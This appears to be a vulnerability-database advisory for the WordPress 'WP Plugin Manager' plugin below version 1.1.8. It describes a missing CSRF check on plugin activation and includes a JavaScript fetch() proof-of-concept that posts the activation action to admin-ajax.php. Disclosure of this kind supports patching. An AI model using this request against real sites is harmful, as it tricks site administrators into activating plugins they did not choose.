Lucene search

K
wpexploitWpvulndbWPEX-ID:A956F1CD-FCE4-4235-B1AF-4B7675A60CA2
HistoryFeb 28, 2023 - 12:00 a.m.

WP Plugin Manager < 1.1.8 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
wpvulndb
56
wordpress
plugin manager
arbitrary activation
csrf
security exploit

0.001 Low

EPSS

Percentile

29.7%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wppluginmanager_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

29.7%

Related for WPEX-ID:A956F1CD-FCE4-4235-B1AF-4B7675A60CA2